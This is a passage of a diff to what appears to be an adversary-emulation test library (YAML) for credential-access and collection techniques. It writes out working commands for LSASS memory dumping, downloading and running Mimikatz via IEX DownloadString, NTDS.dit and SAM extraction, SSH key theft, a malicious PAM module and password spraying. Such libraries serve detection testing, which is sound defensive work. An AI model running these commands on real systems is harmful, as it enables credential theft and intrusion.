C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full -' + ' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -3639,10 +3639,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) -' + ' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null @@ -3651,7 +3651,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using NanoDump @@ -3669,21 +3669,21 @@ credential-access: - description: 'NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) -' + ' prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" executor: command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" -' + ' cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3726,10 +3726,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -3739,19 +3739,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) -' + ' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" -' + ' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" -' + ' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit -' + ' name: command_prompt elevation_required: true - name: LSASS read with pypykatz @@ -3768,35 +3768,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live lsa -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3813,7 +3813,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3841,10 +3841,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3854,7 +3854,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Powershell Mimikatz @@ -3876,7 +3876,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds -' + ' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3898,15 +3898,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 -' + ' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" -' + ' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3916,7 +3916,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3941,10 +3941,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe -' + ' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3952,7 +3952,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1557: @@ -4158,19 +4158,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -4197,34 +4197,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' - description: 'Volume shadow copy must exist -' + ' prereq_command: 'if not exist #{vsc_name} (exit /b 1) -' + ' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vssadmin''" to fulfill this requirement -' + ' - description: 'Extract path must exist -' + ' prereq_command: 'if not exist #{extract_path} (exit /b 1) -' + ' get_prereq_command: 'mkdir #{extract_path} -' + ' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit @@ -4256,22 +4256,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -4290,19 +4290,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy remotely with WMI @@ -4325,18 +4325,18 @@ credential-access: - description: 'Target must be a reachable Domain Controller, and current context must be domain admin -' + ' prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief -' + ' get_prereq_command: 'echo Sorry, can''t connect to target host, check: network, firewall or permissions (must be admin on target) -' + ' executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell @@ -4500,11 +4500,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4530,11 +4530,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4577,14 +4577,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -4592,7 +4592,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -4759,10 +4759,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) -' + ' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4827,7 +4827,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1110.002: @@ -4995,7 +4995,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -5008,14 +5008,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -5107,7 +5107,7 @@ credential-access: description: 'Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller -' + ' supported_platforms: - windows input_arguments: @@ -5130,7 +5130,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -5180,7 +5180,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. -' + ' supported_platforms: - azure-ad input_arguments: @@ -5197,14 +5197,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -5236,7 +5236,7 @@ credential-access: dependencies: - description: 'Check if running on a Debian based machine. -' + ' prereq_command: | if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi @@ -5244,7 +5244,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'apt-get update && apt-get install -y openssl sudo -' + ' executor: elevation_required: true command: | @@ -5267,7 +5267,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target -' + ' name: sh - name: SUDO brute force Redhat auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade @@ -5279,7 +5279,7 @@ credential-access: dependencies: - description: 'Check if running on a Redhat based machine. -' + ' prereq_command: | if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi @@ -5287,7 +5287,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'yum -y update && yum install -y openssl sudo -' + ' executor: elevation_required: true command: | @@ -5310,7 +5310,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target -' + ' name: sh T1555.005: technique: @@ -5476,13 +5476,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt -' + ' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) -' + ' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat -' + ' executor: name: command_prompt elevation_required: false @@ -5490,7 +5490,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL -' + ' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -5589,14 +5589,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -5716,10 +5716,10 @@ credential-access: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -5753,35 +5753,35 @@ credential-access: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1552.004: technique: id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf @@ -5856,14 +5856,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key -' + ' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. -' + ' supported_platforms: - macos - linux @@ -5879,17 +5879,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. -' + ' supported_platforms: - linux input_arguments: @@ -5907,14 +5907,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} -' + ' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5933,14 +5933,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5959,7 +5959,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: ADFS token signing and encryption certificates theft - Local auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f @@ -5972,13 +5972,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. -' + ' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: | Import-Module AADInternals -Force @@ -6018,14 +6018,14 @@ credential-access: dependencies: - description: 'AADInternals and ActiveDirectory modules must be installed. -' + ' prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc @@ -6120,7 +6120,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6141,7 +6141,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -6169,7 +6169,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6178,11 +6178,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python -' + ' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" -' + ' executor: name: sh elevation_required: true @@ -6194,7 +6194,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' T1606.002: technique: external_references: @@ -6289,13 +6289,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. -' + ' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: | Import-Module AADInternals -Force @@ -6383,42 +6383,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials -' + ' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live registry -' + ' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -6444,12 +6444,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} -' + ' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 -' + ' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -6501,7 +6501,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File -' + ' supported_platforms: - windows input_arguments: @@ -7315,7 +7315,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} -' + ' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -7411,7 +7411,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7427,10 +7427,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7438,15 +7438,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7462,25 +7462,25 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7496,10 +7496,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7507,15 +7507,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7531,10 +7531,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7543,7 +7543,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} -' + ' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' @@ -7626,10 +7626,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7639,10 +7639,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -7662,10 +7662,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7703,11 +7703,11 @@ collection: dependencies: - description: 'Winzip must be installed -' + ' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' -' + ' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -7727,7 +7727,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation -' + ' supported_platforms: - windows input_arguments: @@ -7742,10 +7742,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) -' + ' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -7764,7 +7764,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. -' + ' supported_platforms: - linux - macos @@ -7781,11 +7781,11 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) -' + ' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip) echo Please set input_files argument to include files that exist @@ -7794,16 +7794,16 @@ collection: elevation_required: false command: 'zip #{output_file} #{input_files} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -7823,16 +7823,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) -' + ' cleanup_command: 'rm -f #{input_file}.gz -' + ' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -7848,28 +7848,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) -' + ' prereq_command: 'test -e #{input_file_folder} -' + ' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists -' + ' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration -' + ' supported_platforms: - macos - linux @@ -7892,7 +7892,7 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" executor: @@ -7906,7 +7906,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} -' + ' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -7956,7 +7956,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet -' + ' name: powershell T1119: technique: @@ -8026,7 +8026,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -8042,7 +8042,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null -' + ' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -8131,7 +8131,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. -' + ' supported_platforms: - windows executor: @@ -8141,14 +8141,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 -' + ' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: 